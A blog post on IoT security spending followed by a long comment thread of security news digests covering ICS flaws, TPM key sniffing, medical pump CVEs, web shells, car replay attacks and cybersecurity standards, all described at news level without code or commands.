The 1.5 Billion Dollar Market: IoT Security
The two biggest challenges in 2018 will continue to be protecting against unauthorized access, and patching/updating the software of the device. Companies must not neglect the security problems of IoT and IIoT devices. Cyberattacks on the Internet of Things (IoT) are already a reality.

According to Gartner‘s market researchers, global spending on IoT security will increase to $1.5 billion this year.


  1. Tomi Engdahl says:

    IoT/ICS Armageddon: hacking devices like there’s no tomorrow (part 1)
    The truth is that hacking OT devices wasn’t challenging enough. Today, like five years ago, the security in the area is running 10/15 years behind the traditional IT sector. In a few words:

  2. Tomi Engdahl says:

    Webinar: Embedded cyber security – regulatory news update

    Watch this session to get a concise overview of the most interesting regulatory news over the first half of 2021 and possible next steps, both from Operational Technology and Consumer IoT perspectives. Also highlights from ETSI Security Week 2021 will be summarized.

  3. Tomi Engdahl says:

    Facebook bans academics who researched ad transparency and misinformation on Facebook
    The researchers say their work is being silenced. Facebook has banned the personal accounts of academics who researched ad transparency and the spread of misinformation on the social network. Facebook says the group violated its term of service by scraping user data without permission. But the academics say they are being silenced for exposing problems on Facebook’s platform.

    How a fake network pushes pro-China propaganda
    A sprawling network of more than 350 fake social media profiles is pushing pro-China narratives and attempting to discredit those seen as opponents of China’s government, according to a new study. The aim is to delegitimise the West and boost China’s influence and image overseas, the report by the Centre for Information Resilience (CIR) suggests.

  4. Tomi Engdahl says:

    Black Hat: Security Bugs Allow Takeover of Capsule Hotel Rooms
    A researcher was able to remotely control the lights, bed and ventilation in “smart” hotel rooms via Nasnos vulnerabilities.

  5. Tomi Engdahl says:

    NicheStack TCP/IP-toteutuksesta löytyi useita haavoittuvuuksia
    Erityisesti sulautetuissa järjestelmissä käytössä olevasta NicheStack TCP/IP -toteutuksesta löytyi 14 haavoittuvuutta. Nyt julkaistuista haavoittuvuuksista kaksi on kriittisiä, jotka mahdollistavat etänä suoritettavat komennot. Useat sulautettuja järjestelmiä tuottavat valmistajat käyttävät kyseistä toteutusta omissa tuotteissaan.

  6. Tomi Engdahl says:

    Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure
    Programmable Logic Controllers (PLC) and Safety Instrumented Systems
    (SIS) Controllers have historically included an external switch, generally in the form of a key, to perform maintenance and troubleshooting. The key switch has become commonplace for automation engineers and technicians who maintain and support these systems and understand the importance of the little switch in overall device operation and affects the underlying process.

  7. Tomi Engdahl says:

    Trusted platform module security defeated in 30 minutes, no soldering required
    Sometimes, locking down a laptop with the latest defenses isn’t enough. Microsoft’s BitLocker, meanwhile, doesn’t use any of the encrypted communications features of the latest TPM standard. That meant if the researchers could tap into the connection between the TPM and the CPU, they might be able to extract the key.

  8. Tomi Engdahl says:

    - From stolen laptop to inside the company network
    To recap, we took a locked down FDE laptop, sniffed the BitLocker decryption key coming out of the TPM, backdoored a virtualized image, and used its VPN auto-connect feature to attack the internal corporate network. That is one way to go from stolen laptop to internal compromise.

  9. Tomi Engdahl says:

    2021 Global IoT Trends Report
    We reached out to our global customer base with an IoT survey between September 2020 and December 2020. We got 2,095 completed questionnaires, primarily from engineers of IoT solutions, in 60 countries.

  10. Tomi Engdahl says:

    Scam-baiting YouTube channel Tech Support Scams taken offline by tech support scam
    “So to prove that anyone can be scammed,” Browning announced via Twitter following the attack, “I was convinced to delete my YouTube channel because I was convinced I was talking [to YouTube] support. I never lost control of the channel, but the sneaky s**t managed to get me to delete the channel. Hope to recover soon.”

  11. Tomi Engdahl says:

    Top Routinely Exploited Vulnerabilities
    This Joint Cybersecurity Advisory was coauthored by the U.S.
    Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdoms National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). . This advisory provides details on the top 30 vulnerabilitiesprimarily Common Vulnerabilities and Exposures (CVEs)routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.

  12. Tomi Engdahl says:

    The 25 most dangerous software vulnerabilities to watch out for
    Top of the list with the highest score by some margin is CWE-787:
    Out-of-bounds Write, a vulnerability where software writes past the end, or before the beginning, of the intended buffer. . Second in the list is CWE-79: Improper Neutralization of Input During Web Page Generation, a cross-site scripting vulnerability which doesn’t correctly neutralise inputs before being placed as outputs on a website. . Third in the list is CWE-125: Out-of-bounds Read, a vulnerability which can allow attackers read sensitive information from other memory locations or cause a crash.

    It’s time for a Business Logic API Security Testing Approach
    To do this, you must find ways to simplify and streamline your organization’s API security testing, integrating and enforcing API security testing standards within the development cycle. This way, along with runtime monitoring, the security team can gain visibility into all known vulnerabilities in one place. As a bonus, taking steps to shift-left API security testing will cut costs and accelerate .
    time to remediation.

  13. Tomi Engdahl says:

    Zero trust architecture design principles 1.0 launched.
    The eight principles outlined in our guidance will help you to implement your own zero trust network architecture in an enterprise environment.. The principles are: Know your architecture, including users, devices, services and data. Know your User, Service and Device identities. Assess your user behaviour, device and service health. Use policies to authorise requests. Authenticate & Authorise everywhere.
    Focus your monitoring on users, devices and services. Don’t trust any network, including your own. Choose services designed for zero .

  14. Tomi Engdahl says:

    Top Organizations on GitHub Vulnerable to Dependency Confusion Attacks
    On analyzing these repositories, we found that 93 repositories out of Top 1000 GitHub Organizations are using a package that doesnt exist on a public package index which can be claimed by an attacker to cause a supply chain attack. On similar lines, we observed that 169 repositories were found to be installing dependencies from a host that isnt reachable over the internet and 126 repositories . were installing packages owned by a GitHub/Gitlab user that doesnt exist.

  15. Tomi Engdahl says:

    Significant Historical Cyber-Intrusion Campaigns Targeting ICS
    To raise awareness of the risks toand improve the cyber protection ofcritical infrastructure, CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory as well as updates to five alerts and advisories. These alerts and advisories contain information on historical cyber-intrusion campaigns that have targeted ICS

  16. Tomi Engdahl says:

    Verifiable design in modern systems
    The way we design and build software is continually evolving. Just as we now think of security as something we build into software from the start, we are also increasingly looking for new ways to minimize trust in that software. One of the ways we can do that is by designing software so that you can get cryptographic certainty of what the software has done. In this post, we’ll introduce the concept of verifiable data structures that help us get this cryptographic certainty. We’ll describe some existing and new applications of verifiable data structures, and provide some additional resources we have created to help you use them in your own applications.

  17. Tomi Engdahl says:

    TSA Pipeline Security Guideline Update
    n the United States, CISA identifies 16 critical infrastructure sectors considered vital to our economy and way of life. Energy is one of the critical sectors and is quite literally the lifeline that every other sector depends on. The energy sector is made up of the electric and oil and natural gas subsectors. While the electric subsector has for over a decade had minimum mandatory cybersecurity requirements, there have been understandable challenges in implementing similar standards for the oil and natural gas subsector.

  18. Tomi Engdahl says:

    Web shells: How can we get rid of them and why law enforcement is not really the answer
    Microsoft recorded a total of 144,000 web shell attacks between August
    2020 and January 2021. Web shells are very light programmes (scripts) that hackers install to either attack affected websites or web-facing services or prepare a future attack. A web shell allows hackers to execute standard commands on web servers that have been compromised.
    Web shells use code such as PHP, JSP or ASP for this purpose. When the web shells are successfully installed, the hackers are able to execute the same commands as the administrators of the website can. They can also execute commands that steal data, install malicious code and provide system information that allows hackers to penetrate deeper into networks.

  19. Tomi Engdahl says:

    The Challenges of Vulnerability Management in OT Environments
    After careful analysis and field validation, Dragos has found that publicly announced vulnerability severity scores are often inaccurate, incomplete and lack both context and guidance. This means that industrial teams are struggling with how to interpret and apply them in their environments and spending too much time chasing the wrong issues.. Whitepaper at

  20. Tomi Engdahl says:

    August 2021 ICS Patch Tuesday: Siemens, Schneider Address Over 50 Flaws

    Siemens and Schneider Electric on Tuesday released 18 security advisories addressing a total of more than 50 vulnerabilities affecting their products.

    The vendors have provided patches, mitigations, and general security recommendations for reducing the risk of attacks.

  21. Tomi Engdahl says:

    Leading Threat to Industrial Security is Not What You Think

    As attackers become more sophisticated, so do their attacks. This in turn exposes threat vectors that once were thought to be well protected, or at least not interesting enough to attack. Nowhere is this truer than in industrial control systems (ICS) environments.

    The growing practice of connecting ICS to enterprise networks and the internet, driven by technologies such as IoT, edge computing and analytics platforms, has put ICS on the radar of cybercriminals.

    ICS attacks can cause severe problems, ranging from supply chain disruption to physical damage to components and subsystems. What’s more, ICS traffic often contains proprietary data or information that has intrinsic value to business processes or workflows.

    Securing ICS is more challenging than protecting traditional IT environments since ICS is insecure by design. ICS was originally conceived to be siloed from other IT systems, shared IT infrastructure and the outside world. These closed systems were considered immune from external threats, simply because they were “air gapped”.

    Advances in IoT technologies and other IT centric systems made it logical to connect ICS to IT to garner numerous benefits. However, very few considered the implications of that connectivity, which cybercriminals are able to exploit. Especially the native insecurities of ICS, such as limited policies, a lack of access control provisions, weak password enforcement and infrequent patching. Perhaps the biggest threat to ICS is the fact that utility companies are such large targets – they are well known, cover large geographic areas, and their critical locations are all very public.

    Consider the following attack vectors that can impact ICS.

    Brute force attacks against weak passwords are something IT pros have been dealing with for years and have developed countermeasures against. However, most ICS systems lack policies around passwords, meaning that attacks may go unnoticed or unrecorded. Here, ICS operators need to learn what constitutes a brute force attack, identify the signs of such an attack, and implement controls to prevent damage. Processes that require knowledge, action, and response. Those processes must be taught.

    Another attack vector is false data injection, whose primary goal is to disrupt ICS processes. In the IT world, DDoS (Distributed Denial of Service) attacks are focused on disruption. However, with ICS false data injection may take on a different characteristic, one that not only disrupts processing, but potentially damages physical equipment, or cascades to other devices. ICS operators must learn how to monitor for those types of attacks, create policies that can stem them, and remediate vulnerabilities they exploit.

    Other attack vectors ICS is susceptible to include buffer overflows, command injection, PLC programming modifications, and many more. Dealing with those attacks requires knowledge of both ICS and IT, meaning that ICS operators must achieve the same level of cyber competency as their IT counterparts, while also applying their knowledge of the intricacies of ICS.

    Simply put, organizations must put in place plans and policies to adequately train those that manage ICS, build realistic scenarios, and also provide a layer of anonymity for those responding to those threats.

  22. Tomi Engdahl says:

    Philips study finds hospitals struggling to manage thousands of IoT devices
    Working with cybersecurity company CyberMDX, researchers with Philips surveyed 130 IT healthcare decision-makers to figure out how they were managing the thousands of medical devices that populate most hospitals today.

  23. Tomi Engdahl says:

    What Is Zero Trust and Why Does It Matter?
    As the remote workforce expanded, so did the attack surface for cybercriminalsforcing security teams to pivot their strategy to effectively protect company resources. During this time of change, the hype around Zero Trust increased, but with several different interpretations of what it was and how it helps. Eric Skinner from Trend Micro gets real about the true intent of Zero Trust and how you can use it better protect your organization.

  24. Tomi Engdahl says:

    How ‘shift left’ helps secure today’s connected embedded systems – EDN
    DevSecOps—which stands for development security operations—expands on DevOps principles with a “shift left” principle, designing and testing for security early and continuously in each software iteration.
    Defense-in-depth and the process model
    Traditionally, the practice for secure embedded code verification has been largely reactive. Code is developed in accordance with relatively loose guidelines and then subjected to performance, penetration, load, and functional testing to identify vulnerabilities.
    A more proactive approach ensures code is secure by design. That implies a systematic development process, where the code is written in accordance with secure coding standards, is traceable to security requirements, and is tested to demonstrate compliance with those requirements as development progresses.
    One interpretation of this proactive approach integrates security-related best practices into the V-model software development lifecycle that is familiar to developers in the functional safety domain. The resulting secure software development life cycle (SSDLC) represents a shift left for security-focused application developers, ensuring that vulnerabilities are designed out of the system (Figure 1).
    Shift left: What it means
    The concepts behind the “shift left” principle should be familiar to anyone developing safety-critical applications because for many years, functional safety standards have demanded a similar approach. Consequently, the following best practices proven in the functional safety domain apply to security-critical applications as well:
    Establish requirements at the outset
    Undocumented requirements lead to miscommunication on all sides and create rework, changes, bug fixes, and security vulnerabilities. To ensure smooth project development, all team members must understand in the same way all parts of the product and the process of its development. Clearly defined functional and security requirements help ensure they do.

  25. Tomi Engdahl says:

    Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure

  26. Tomi Engdahl says:

    ”Tappo­kytkin” paljastui: Samsung pimensi televisioita etähallinnalla
    Etelä-Afrikka todistaa harvinaisella tavalla, millainen valta valmistajalla voi olla omista laitteistaan.

  27. Tomi Engdahl says:

    Vulnerabilities Allow Hackers to Tamper With Doses Delivered by Medical Infusion Pumps

    McAfee security researchers, in partnership with Culinda, identified a series of severe vulnerabilities in B. Braun’s Infusomat Space large volume infusion pump and SpaceStation system that they claim could potentially lead to dispensing potentially lethal doses of medication.

    A total of five vulnerabilities were identified, the most severe of which carries a CVSS score of 9.7 and is tracked as CVE-2021-33885. The issue exists because the device doesn’t verify who is sending the commands, thus allowing a remote, unauthenticated attacker to send input to the device, which will use it instead of the correct data.

    Next in line is CVE-2021-33886 (CVSS score of 8.2), where proprietary networking commands aren’t properly authenticated, thus allowing an attacker to reconfigure the device remotely.

    The remaining three issues include CVE-2021-33886 (CVSS score of 7.7), which allows an attacker to gain user level command line access, CVE-2021-33883 (CVSS score of 7.1), where sensitive information is transmitted in clear text, and CVE-2021-33884 (CVSS score of 5.8), where an attacker could upload files to a directory.

  28. Tomi Engdahl says:

    Engineering Workstations Are Concerning Initial Access Vector in OT Attacks

    Organizations that use industrial control systems (ICS) and other operational technology (OT) are increasingly concerned about cyber threats, and while they have taken steps to address risks, many don’t know if they have suffered a breach, according to a survey conducted by the SANS Institute on behalf of industrial cybersecurity firm Nozomi Networks.

    The SANS 2021 OT/ICS Cybersecurity Report is based on information provided by 480 individuals from a wide range of industries.

    The survey conducted by SANS showed that nearly 70% of respondents believe the risk to their OT environment is high or severe, which is a significant increase from the 51% in 2019, when SANS conducted a similar survey.

  29. Tomi Engdahl says:

    Flaws in John Deere Systems Show Agriculture’s Cyber Risk
    John Deere, Researchers Spar Over Impact of Vulnerabilities

  30. Tomi Engdahl says:

    Hacker Claims Honda And Acura Vehicles Vulnerable To Simple Replay Attack

    Keyless entry has become a standard feature on virtually all cars, where once it was a luxury option. However, it’s also changed the way that thieves approach the process of breaking into a car. After recent research, [HackingIntoYourHeart] claims that many modern Honda and Acura vehicles can be accessed with a simple replay attack using cheap hardware.

    It’s a bold claim, and one that we’d love to see confirmed by a third party. The crux of the allegations are that simply recording signals from a Honda or Acura keyfob is enough to compromise the vehicle. Reportedly, no rolling code system is implemented and commands can easily be replayed.

  31. Tomi Engdahl says:

    Karu ennustus: Kyber¬murhista tulee totta 4 vuodessa
    Gartner Predicts By 2025 Cyber Attackers Will Have Weaponized Operational Technology Environments to Successfully Harm or Kill Humans
    Organizations Can Reduce Risk by Implementing a Security Control Framework
    By 2025, cyber attackers will have weaponized operational technology (OT) environments to successfully harm or kill humans, according to Gartner, Inc.
    Attacks on OT – hardware and software that monitors or controls equipment, assets and processes – have become more common. They have also evolved from immediate process disruption such as shutting down a plant, to compromising the integrity of industrial environments with intent to create physical harm. Other recent events like the Colonial Pipeline ransomware attack have highlighted the need to have properly segmented networks for IT and OT.
    “In operational environments, security and risk management leaders should be more concerned about real world hazards to humans and the environment, rather than information theft,” said Wam Voster, senior research director at Gartner. “Inquiries with Gartner clients reveal that organizations in asset-intensive industries like manufacturing, resources and utilities struggle to define appropriate control frameworks.”
    Gartner predicts that the financial impact of CPS attacks resulting in fatal casualties will reach over $50 billion by 2023. Even without taking the value of human life into account, the costs for organizations in terms of compensation, litigation, insurance, regulatory fines and reputation loss will be significant. Gartner also predicts that most CEOs will be personally liable for such incidents.

  32. Tomi Engdahl says:

    Samsung Can Remotely Disable Any of Its TVs Worldwide
    The technology is called TV Block, and it’s pre-loaded on every Samsung TV.

    On July 11, a distribution center located in KwaZulu-Natal, South Africa was looted and an unknown number of Samsung televisions were stolen. However, all of those TVs are now useless as Samsung has revealed they are fitted with remote blocking technology.

    What you may be surprised to hear is that Samsung can do this to any of its TVs, regardless of where they are in the world. The company admitted as much in its latest Samsung Newsroom post detailing how the TVs in South Africa were stolen and then disabled.

    The technology is called TV Block and it’s “pre-loaded on all Samsung TV products.” Whenever a TV is confirmed as being stolen, Samsung logs the serial number of the TV and then waits for it to be connected to the internet. At that point a Samsung server is connected to by default, the serial number is checked, and if it’s on the list, “the blocking system is implemented, disabling all the television functions.”

  33. Tomi Engdahl says:

    IoT Attacks Skyrocket, Doubling in 6 Months
    According to a Kaspersky analysis of its telemetry from honeypots shared with Threatpost, the firm detected more than 1.5 billion IoT attacks up from 639 million during the previous half year, which is more than twice the volume.

  34. Tomi Engdahl says:

    Uusi merenkulun kyberturvallisuus­ohjeistus varustamoille ja aluksille
    Suomen Varustamot ry ja Huoltovarmuusorganisaatioon kuuluva Vesikuljetuspooli ovat julkaisseet kyberturvallisuuden parhaat käytännöt -ohjeistuksen varustamoille ja aluksille. Ohjeistus perustuu yhdessä tehtyyn laajaan merenkulun kyberturvallisuusselvitykseen.

  35. Tomi Engdahl says:

    The ISO/SAE 21434 standard is the start of a long and tenuous journey that will inevitably see many design challenges along the way.
    Read the full article:
    #EDN #Cybersecurity

    ISO/SAE 21434 auto cybersecurity standard: Dawn of a new era?

    The news about NXP Semiconductors certified by TÜV SÜD to comply with the new automotive cybersecurity standard ISO/SAE 21434 is the harbinger of a new era that could be reminiscent of how the ISO 26262 functional safety standard reshaped the automotive industry during the past decade. NXP claims to be the first chipmaker to have complied with the ISO/SAE 21434 standard.

    Vehicle manufacturers must comply with the R155 automotive cybersecurity regulation for new vehicle type launches in Europe, Japan, and Korea from July 2022 onward; the new automotive cybersecurity standard will be crucial in implementing the R155 requirements across the automotive supply chain. ISO/SAE 21434 provides a rigorous framework intended to enable organizations to design vehicles that are protected against a variety of cybersecurity threats.

    Unlike the ISO 26262 functional safety standard published in 2011, a standard for automotive cybersecurity has lagged behind. That, in turn, has been terrifying automotive companies since vehicles either already have or will have over-the-air (OTA) software updates. More broadly, as hackers have demonstrated time and again, security vulnerabilities can be introduced both in hardware and software flows.

    Connected vehicles linked with external entities—other vehicles, smart city infrastructure, and the cloud—will inevitably require robust security measures to protect the vehicle, its systems, and the back-end networks. The ISO/SAE 21434 standard sets out a framework for effectively managing cybersecurity risks in electrical and electronic (E/E) systems in road vehicles.

  36. Tomi Engdahl says:

    Täysin suojattu IoT-radio alle gigahertsiin

    IoT-operaattorit haluavat laitteita, jotkakantavat pitkälle, tulevat toimeen pitkään paristovirralla ja ovat 100-prosenttisesti suojattuja, jotta sensitiivinen data pysyy oikeissa käsissä. Silicon Labs vastaa toiveisiin uusilla Secure Vault -sarjan järjestelmäpiireillä.

    Tähän asti piirien tietoturva on ollut jotain, jonka asiakas lisää siruihin ja sovelluksiin sen jälkeen, kun ne tulevat toimittajan tuotantolinjalta. Nyt SiLabs antaa asiakkaille mahdollisuuden tuoda tietoturva piireihinsä jo tehtaalla.

    Tämä tarkoittaa, että asiakas pääsee muuttamaan tuotenumeroita, lisäämään salausavaimia ja -sertifikaatteja, lisäämään tai poistamaan toimintoja oman tarpeen mukaan ja niin edelleen. Tämän myötä yhtiö tarjoaa ensimmäisiä täysin suojattuja SoC-piirejä alle gigahertsin IoT-yhteyksiin, oli käytössä oleva radioprotokolla mitä tahansa.

    Ensimmäiset uuden polven piirit ovat ERF32-sarjan FG23- ja ZG23 -piirit.

  37. Tomi Engdahl says:

    IoT-laitteille täysin varma PUF-suojaus

    Ainoa täysin varman tekniikka suojata esimerkiksi ohjainten salausavaimet on PUF (physically unclonable function). Siinä ei ole mitään digitaalisesti tallennettua salausavainta, jonka voisi kopioida. Analogi Devicesiin nykyään kuuluva Maxim Integrated Products on esitellyt markkinoiden vähävirtaisimman PUF-ohjaimen.

    MAXQ1065-tietoturvaprosessori tarjoaa avaimet käteen -salaustoimintoja esimerkiksi laitteiden keskinäiseen todennukseen, suojattuun käynnistykseen, suojatulle laiteohjelmistopäivitykselle ja suojatulle viestinnälle. Se sisältää vakioalgoritmit avainten vaihtoon ja joukkosalaukseen tai täydellisen siirtokerroksen TLS-suojauksen. Piirillä on 8 kilotavua turvallista tallennustilaa käyttäjätiedoille, avaimille, varmenteille ja laskureille, joissa on käyttäjän määrittämät kulunvalvonta- ja elinkaarenhallintatoiminnot IoT-laitteille.

    Ultra Low-Power Cryptographic Controller with ChipDNATM for Embedded Devices


Leave a Comment

Your email address will not be published. Required fields are marked *